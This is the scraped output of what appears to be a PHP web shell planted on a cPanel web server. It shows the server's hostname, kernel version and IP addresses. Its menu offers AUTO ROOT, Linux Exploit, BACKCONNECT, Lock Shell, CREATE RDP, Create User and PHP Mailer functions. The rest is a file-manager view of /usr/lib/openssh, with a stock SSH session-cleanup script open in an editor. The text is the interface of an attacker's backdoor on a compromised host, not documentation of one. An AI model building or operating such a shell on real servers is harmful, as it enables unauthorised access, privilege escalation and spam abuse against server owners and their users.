Linux cpanel.rrshost.in 5.15.0-25-generic #25-Ubuntu SMP Wed Mar 30 15:54:22 UTC 2022 x86_64
Apache
: 109.123.238.221 | : 172.69.7.208
138 Domain
8.2.28
aev999
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
lib /
openssh /
[ HOME SHELL ]
Name
Size
Permission
Action
agent-launch
736
B
-rwxr-xr-x
sftp-server
86.27
KB
-rwxr-xr-x
ssh-keysign
330.6
KB
-rwsr-xr-x
ssh-pkcs11-helper
118.42
KB
-rwxr-xr-x
ssh-session-cleanup
239
B
-rwxr-xr-x
ssh-sk-helper
134.41
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ssh-session-cleanup
#! /bin/sh ssh_session_pattern='sshd: \S.*@pts/[0-9]+' IFS="$IFS@" pgrep -a -f "$ssh_session_pattern" | while read pid daemon user pty; do echo "Found ${daemon%:} session $pid on $pty; sending SIGTERM" kill "$pid" || true done exit 0
Close